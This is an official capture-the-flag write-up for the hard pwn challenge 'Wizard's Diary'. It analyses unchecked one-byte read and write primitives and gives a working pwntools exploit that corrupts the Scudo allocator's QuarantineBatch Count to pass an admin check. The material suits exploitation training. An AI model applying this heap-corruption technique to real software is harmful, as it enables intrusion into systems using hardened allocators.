0% found this document useful (0 votes)
19 views15 pages

Wizard's Diary

Uploaded by

sieudat123
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
19 views15 pages

Wizard's Diary

Uploaded by

sieudat123
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

Wizard's diary

18th Nov 2022 / Document No.


D22.102.263

Prepared By: ir0nstone

Challenge Author(s): fuzzerakos

Difficulty: Hard

Classification: Official

Synopsis
Wizard's Diary is a Hard pwn challenge that features the Scudo Allocator's quarantine
implementation and the corrupting of this structure to gain a Write-Where-Ptr primitive.

Skills Learned
Scudo Allocator

Analysis
We are given a Dockerfile which loads a binary wizards_diary and serves it. We see in
run.sh that some additional options are listed:

$ cat run.sh
export
SCUDO_OPTIONS="thread_local_quarantine_size_kb=64:quarantine_size_kb=256:quaran
tine_max_chunk_size=2048"
export LD_PRELOAD="./libscudo.so"
./wizards_diary

There is another .so library file provided to us through LD_PRELOAD called libscudo.so , and it
seems to use the SCUDO_OPTIONS environment variable. Some research tells us that the Scudo
Allocator is a hardened allocator that "provides additional mitigation against heap based
vulnerabilities, while maintaining good performance". Among other things, it is the default
allocator for Android 11. We'll analyse this again in more depth later.
Protections
We'll start with a checksec :

As we can see:

Protection Enabled Usage

Canary ✅ Prevents Buffer Overflows

NX ✅ Disables code execution on stack

PIE ✅ Randomizes the base address of the binary

RelRO Full Makes some binary sections read-only

The interface of the program looks like this:

Decompilation
main()
Classic setup for a heap note challenge:

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int choice; // [rsp+8h] [rbp-8h]
int not_suitable; // [rsp+Ch] [rbp-4h]

not_suitable = 0;
setup(argc, argv, envp);
puts("=*=*= Welcome to University of Magic! =*=*=");
puts("This app was created to aid the learning process of new magicians!");
login();
for ( choice = get_option(); ; choice = get_option() )
{
if ( !choice )
{
puts("Leaving University...");
exit(0);
}
if ( choice == 1337 )
{
if ( *(_DWORD *)(logged_in_magician + 4) && *(_DWORD *)logged_in_magician
)
{
system("cat flag.txt");
exit(1337);
}
puts("You are not admin!");
}
else
{
if ( choice > 1337 )
goto LABEL_20;
if ( choice == 4 )
{
show_note();
continue;
}
if ( choice > 4 )
goto LABEL_20;
if ( choice != 3 )
{
if ( choice == 1 )
{
new_note();
continue;
}
if ( choice == 2 )
{
remove_note();
continue;
}
LABEL_20:
puts("There is no such option!");
continue;
}
if ( not_suitable )
{
puts("It seems you are not suitable to be in here...");
exit(-2);
}
fix_note();
not_suitable = 1;
}
}
}

The auth flow is simple:

Call login()

Get a choice using get_option()

If 0 , quit

If 1 , call new_note()

If 2 , call remove_note()

If 3 , call fix_note() and set the not_suitable boolean to True

If 4 , call show_note()

If 1337 (secret option), perform a check and read flag.txt if it's passed

Obviously, the last one is of the most interest here, but let's go in order.

login()
After come cleaning up, it looks like this:

void __fastcall login()


{
char *new_magician; // [rsp+8h] [rbp-38h]
char name[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 canary; // [rsp+38h] [rbp-8h]

canary = __readfsqword(0x28u);
printf("Name: ");
fgets(name, 32, stdin);
if ( strcmp(name, "guest\n") )
{
if ( !strcmp(name, "admin\n") )
puts("If you are indeed the admin, you won't have problem changing your
account from guest to admin, right?");
exit(0);
}
new_magician = (char *)malloc(8008uLL);
*(_DWORD *)new_magician = 0;
*((_DWORD *)new_magician + 1) = 0;
printf("Enter a comment to your guest account: ");
fgets(new_magician + 8, 8000, stdin);
logged_in_magician = (__int64)new_magician;
}

The user is asked for a name . If it's not guest , it quits. If it is, a chunk of size 8008 is allocated
and the first 8 bytes of it are nulled out. A new comment is asked for, and the results is read into
the remaining 8000 bytes of the allocated chunk.

This looks like an allocation for a magician struct . We don't know what the first 8 bytes are, but
they seem to be treated as two DWORDs, so we'll set it to two integers for now:
struct Magician {
int a;
int b;
char comment[8000];
}

The compilation looks cleaner once the types are changes to magician * :

void __fastcall login()


{
Magician *new_magician; // [rsp+8h] [rbp-38h]
char name[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 canary; // [rsp+38h] [rbp-8h]

canary = __readfsqword(0x28u);
printf("Name: ");
fgets(name, 32, stdin);
if ( strcmp(name, "guest\n") )
{
if ( !strcmp(name, "admin\n") )
puts("If you are indeed the admin, you won't have problem changing your
account from guest to admin, right?");
exit(0);
}
new_magician = (Magician *)malloc(0x1F48uLL);
new_magician->a = 0;
new_magician->b = 0;
printf("Enter a comment to your guest account: ");
fgets(new_magician->comment, 0x1F40, stdin);
logged_in_magician = new_magician;
}

get_option()

__int64 get_option()
{
unsigned int opt; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
opt = 0;
menu();
__isoc99_scanf("%d", &opt);
return opt;
}

No vulnerabilities here.
new_note()

void __fastcall new_note()


{
int size; // [rsp+8h] [rbp-18h] BYREF
unsigned int idx; // [rsp+Ch] [rbp-14h]
int *chnk; // [rsp+10h] [rbp-10h]
unsigned __int64 canary; // [rsp+18h] [rbp-8h]

canary = __readfsqword(0x28u);
idx = 0;
while ( notes[idx] )
{
if ( (int)++idx > 15 )
{
puts("You can't add more notes!");
return;
}
}
chnk = (int *)malloc(0x10uLL);
size = 0;
printf("Size of note: ");
__isoc99_scanf("%d", &size);
*chnk = size;
*((_QWORD *)chnk + 1) = malloc(*chnk);
if ( !*((_QWORD *)chnk + 1) )
{
puts("Malloc error!");
exit(-1);
}
printf("Note: ");
read(0, *((void **)chnk + 1), *chnk);
printf("Added note with idx %d \n", idx);
notes[idx] = chnk;
}

It allocates a new chunk. The first 8 bytes contain the size, the second 8 bytes contain a pointer to
another chunk that contains the data. A struct Note , it looks like:

struct Note {
long size;
char *data;
}

It seems as if there is an alignment thrown in, because setting it to be a long results in a lot of
SLODWORD macros around. Instead I'll make it an int , and have another int junk around:

struct Note {
int size;
int junk;
char *data;
}
With these modifications, it looks like this:

void __fastcall new_note()


{
int size; // [rsp+8h] [rbp-18h] BYREF
unsigned int idx; // [rsp+Ch] [rbp-14h]
Note *note; // [rsp+10h] [rbp-10h]
unsigned __int64 canary; // [rsp+18h] [rbp-8h]

canary = __readfsqword(0x28u);
idx = 0;
while ( notes[idx] )
{
if ( (int)++idx > 15 )
{
puts("You can't add more notes!");
return;
}
}
note = (Note *)malloc(0x10uLL);
size = 0;
printf("Size of note: ");
__isoc99_scanf("%d", &size);
note->size = size;
note->data = (char *)malloc(note->size);
if ( !note->data )
{
puts("Malloc error!");
exit(-1);
}
printf("Note: ");
read(0, note->data, note->size);
printf("Added note with idx %d \n", idx);
notes[idx] = note;
}

remove_note()

void __fastcall remove_note()


{
unsigned int idx; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
idx = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
free((void *)notes[idx]);
notes[idx] = 0LL;
puts("Removed!");
}
else
{
puts("Wrong index");
}
}

Simply removes a note, freeing the Note struct and nulling out the index. Note that the data field
of the Note struct is not freed, however.

fix_note()

void __fastcall fix_note()


{
unsigned int idx; // [rsp+0h] [rbp-10h] BYREF
int offset; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
idx = 0;
offset = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
printf("Offset to fix: ");
__isoc99_scanf("%d", &offset);
getchar();
printf("Correct byte: ");
__isoc99_scanf("%c", &notes[idx]->data[offset]);
puts("Fixed!");
}
else
{
puts("Wrong index");
}
}

Here is the start of the bugs. A note index is asked for, and then an offset. data[offset] is then
modified based on user input, but offset is not checked to be in the 0-8000 range, allowing for a
single-byte relative write. Remember that once fix_note() is called, it can't be called again.

show_note()

void __fastcall show_note()


{
unsigned int idx; // [rsp+0h] [rbp-10h] BYREF
int offset; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
idx = 0;
offset = 0;
printf("Index of note: ");
__isoc99_scanf("%d", &idx);
if ( idx <= 0xF && notes[idx] )
{
printf("Offset to show: ");
__isoc99_scanf("%d", &offset);
getchar(); // consume newline
printf("Byte: ");
printf("%c\n", (unsigned int)notes[idx]->data[offset]);
}
else
{
puts("Wrong index");
}
}

Exact same vulnerability, but this time for reading. This is not restricted by only being available
once.

Summary
If we go back to main() , we can again see the criteria for entering 1337 using our newly-modified
structs:

if ( choice == 1337 )
{
if ( logged_in_magician->b && logged_in_magician->a )
{
system("cat flag.txt");
exit(1337);
}
puts("You are not admin!");
}

We need both logged_in_magician->a and logged_in_magician->b to be non-null. Both of


these are initially set to null, with no in-built way to modify it. In addition to this:

We have one single-byte relative write

We as many single-byte relative reads as we want

An initial thought could be to overwrite a and b with the arbitrary write, but we only have one!
We need a different approach.

The Scudo Allocator


Let's look a bit more closely at the flags:

thread_local_quarantine_size_kb=64
quarantine_size_kb=256
quarantine_max_chunk_size=2048

This page explains what these options do.


Option Description

Size (in kilobytes) of per-thread cache used to


thread_local_quarantine_size_kb
offload the global quarantine.

Size (in kilobytes) of quarantine used to delay the


quarantine_size_kb
actual deallocation of chunks.

Size (in bytes) up to which chunks will be


quarantine_max_chunk_size
quarantined (if lower than or equal to).

It seems like we're using Scudo's quarantine functionality. The last option
quarantine_max_chunk_size ensure it's used for struct Note allocations, but not struct
Magician allocations (which are 8008 bytes). Whether or not it's used for the data part of Note
structs depends on which size value we input.

Scudo Quarantines are superseded by ARM MTE, which comes in the latest Android versions. The
official Scudo documentation has the following to say about quarantining:

The Quarantine: offers a way to delay the deallocation operations, preventing blocks to be
immediately available for reuse. Blocks held will be recycled once certain size criteria are
reached. This is essentially a delayed freelist which can help mitigate some use-after-free
situations. This feature is fairly costly in terms of performance and memory footprint, is
mostly controlled by runtime options and is disabled by default.

Quarantined chunks are stored in a QuarantinedBatch structure:

struct QuarantineBatch {
// With the following count, a batch (and the header that protects it) occupy
// 4096 bytes on 32-bit platforms, and 8192 bytes on 64-bit.
static const u32 MaxCount = 1019;
QuarantineBatch *Next;
uptr Size;
u32 Count;
void *Batch[MaxCount];
}

QuarantineBatch structs are in a linked list stored in a QuarantineCache struct. This excellent
un1fuzz article describes the structure of the quarantine-related classes; each QuarantineBatch
stores

A pointer to the next QuarantineBatch in the linked list

A Size variable which is the total sized of quarantined nodes recorded in this batch PLUS the
size of the QuarantineBatch itself

Count , which keeps track of how many nodes are in the Batch array

Batch , the array holding the pointers to quarantined chunks

This QuarantineBatch structure is stored on the heap, along with all of our chunks as well. When
a user frees a chunk, the push_back() function will be called. push_back() is responsible for
adding a pointer to this chunk in the structure:
void push_back(void *Ptr, uptr Size) {
Batch[Count++] = Ptr;
this->Size += Size;
}

The latest version of the quarantine has a check to ensure that Count < MaxCount , but that was
not there at the time of the challenge release (thankfully!):

DCHECK_LT(Count, MaxCount);

Finally, Scudo also randomises allocation locations, as if the other defences weren't enough.

Exploitation
Plan
We want to overwrite the two integers (combined one QWORD ) at the location of
logged_in_magician with something that isn't null. To do this, we will use the singular one-byte
overwrite and target the Count element of the QuarantineBatch structure to point to
logged_in_magician->a . On freeing, it will write a heap address to this location, which will make
both a and b non-null, passing the check and allowing us to receive the flag.

We will set up debugging in Docker in the classic way.

Setup
Normal setup of helper functions:

from pwn import *

p = remote('127.0.0.1' , 1337)

def new_note(size, value):


p.sendlineafter(b'> ', b'1')
p.sendlineafter(b':', str(size).encode())
p.sendlineafter(b':', value)

def remove_note(idx):
p.sendlineafter(b'> ', b'2')
p.sendlineafter(b':', str(idx).encode())

def fix_note(idx, off, byte):


p.sendlineafter(b'> ', b'3')
p.sendlineafter(b':', str(idx).encode())
p.sendlineafter(b':', str(off).encode())
p.sendlineafter(b':', byte)

def show_note(idx, off):


p.sendlineafter(b'> ', b'4')
p.sendlineafter(b':', str(idx).encode())
p.sendlineafter(b':', str(off).encode())

p.recvuntil(b'Byte: ')
b = p.recvline().rstrip()
return b

Finding Offset from Batch to logged_in_magician


So the ultimate aim here is to find out what we have to overwrite Count with in order to overwrite
the first 8 bytes of logged_in_magician . Let's start by setting our comment to something
noticeable, adding a large note for offsetting and also allocating + freeing a collection of chunks.
We do this so that the Count of the QuarantineBatch becomes non-zero, making it easier to
identify.

Note that comment is located 8 bytes after a and b .

# basic setup
p.sendlineafter(b'Name: ', b'guest')
# comment, located 8 bytes after the desirable location
p.sendline(b'i'*8)

# get note for offsetting


new_note(8176, b'note_0')

# free into Scudo to get a QuarantinedBatch


# set Count to 4
for i in range(0, 4):
new_note(100, b'ABCD')
for i in range(0, 4):
remove_note(i+1)

log.info('Set Count to 4')

Let's debug this. Scudo doesn't use the heap so vis_heap_chunks won't show it, but we can
search writeable regions in GDB:

pwndbg> search -w -t bytes iiiiiiii


Searching for value: 'iiiiiiii'
[anon_7f1785e09] 0x7f1785e0f018 'iiiiiiii\n'

If we print out large chunks of this region, everything appears to be null, so let's look at the 4
value for Count and see where that is. We'll assume it's in the same region:

pwndbg> search -1 0x4 anon_7f1785e09


Searching for value: b'\x04'
[anon_7f1785e09] 0x7f1785e0b020 0x4

We can see the structure here is reminiscent of a QuarantineBatch structure:


pwndbg> x/20gx 0x7f1785e0b000
0x7f1785e0b000: 0x6262000001ff011c 0x0000000000000000
0x7f1785e0b010: 0x0000000000000000 0x0000000000002030
0x7f1785e0b020: 0x0000000000000004 0x00007efc85e0ec10 <- Count, Batch[0]
0x7f1785e0b030: 0x00007efc85e0e770 0x00007efc85e0eaf0 <- Batch[1],
Batch[2]
0x7f1785e0b040: 0x00007efc85e0e0b0 0x0000000000000000 <- Batch[3]
0x7f1785e0b050: 0x0000000000000000 0x0000000000000000
0x7f1785e0b060: 0x0000000000000000 0x0000000000000000
0x7f1785e0b070: 0x0000000000000000 0x0000000000000000
0x7f1785e0b080: 0x0000000000000000 0x0000000000000000
0x7f1785e0b090: 0x0000000000000000 0x0000000000000000

So:

Count is located at 0x7f1785e0b020

Batch[0] at 0x7f1785e0b028

logged_in_magician->a is located at 0x7f1785e0f010 (8 before the comment )

Now we just need to work out the offset from Batch[0] to logged_in_magician->a , which is
0x3fe8 . That's 0x7fd QWORDs, so the index we want to write Count to is 0x7fd .

Remember, we can only write one byte. What we're going to do is we'll write the higher byte - the
0x7 - to the second LSB of Count , making it 0x704 . We can then allocate + free 0xff chunks
afterwards to gradually increment the 0x704 over to 0x7fd .

One more thing to note: this offset is not constant. In fact, Scudo allocates chunks in a random
position and reuses chunks at random times to combat heap exploits. We'll have to calculate this
distance dynamically, and to do this we'll abuse the byte read functionality. We'll start at 0 and
keep iterating until we find an i character (the start of logged_in_magician->a ) and until we
also find a \x04 byte (the Count ).

batch_0 = 0
comment = 0
i = 0

while batch_0 == 0 or comment == 0:


# too far, no luck
if(i > 0x10000):
p.close()
log.error('Failed! i was exhausted')

# i is 8-byte aligned, as everything else is


i += 8
c = show_note(0, i)

# found `Count`!
if c == b'\x04':
log.success(f'Found Count at i = {i}!')
# Batch[0] is 8 after Count
batch_0 = i + 8
# found our `comment`!
elif c == b'i':
log.success(f'Found comment at i = {i}!')
# a is 8 before comment
comment = i - 8

Occasionally the comment will be lower in memory than Count , in which case this is not possible,
so we exit early:

# if comment is lower in memory than the Count, we can't overwrite it anyway


if batch_0 > comment:
log.error('Failed: Batch lower in memory than comment')

Calculating the new Count value


Now we want to calculate the new Count value. We'll replicate our manual approach in code - first
we calculated the difference in offsets:

log.info('Calculating offset and writing LSB...')

offset = comment - batch_0

Then we worked out how many indices that would have to be:

idx_count = offset // 8

Then, finally, we removed the last byte:

second_lsb = idx_count >> 8

This is the value we want to write to the second LSB of Count . We'll do that now with our one
write:

# batch_0 - 8 is Count, +1 for second LSB


fix_note(0, batch_0 - 8 + 1, chr(second_lsb).encode())

Trigger Frees and Get Flag


Finally we want to create a bunch of allocations and frees to increment Count to the point that
the LSB is also the correct value to overwrite a and b in logged_in_magician :

log.info(f'Lots of frees')

# brute force 0xff allocations


# this loops the LSB of `Count` through all possible values
# hoping for one to be equal to what we need
for i in range(0xff):
new_note(100, b'A')
remove_note(1)

Note that we only have one loop that allocates and frees immediately here. This is not as reliable
as 0xff allocations followed by 0xff frees as it can reuse chunks, but we are allowed a
maximum of 15 chunks at any one time so we'll have to deal with it.
Finally, send 1337 and get the flag!

# get flag
log.info('Printing Flag...')
p.sendlineafter(b'> ', b'1337')
flag = p.recvline().decode()
log.success(f'Flag: {flag}'

The exploit works perfectly, but not with 100% success rate due to aforementioned randomisation
problems:

We get the fake flag! Now we just have to transfer it remotely and grab the actual flag. It takes a
while (and a few tries), but eventually the flag comes back.

Improving Efficiency
The exploit takes a while, so there's something we can do to speed it up. Count is always 16-byte
aligned, so we can increase i by 16 each times rather than 8 . comment , on the other hand,
always ends in an 8 in hex - it's always 8 more than a 16-byte alignment. That's not a problem -
we can increment by 16 each time, and once we find Count we can increment by 8 once to shift
the incrementing. We can also initialise i as 8176 , as that's the arbitrary size of the Note data
in the first place, so it must be greater than that. The former drops the time taken by an average of
50%, and the latter drops it yet further (by 8176 // 16 = 511 requests, in fact).

i += 16
c = show_note(0, i)

# found `Count`!
if c == b'\x04':
log.success(f'Found Count at i = {i}!')
# Batch[0] is 8 after Count
batch_0 = i + 8
i += 8

You might also like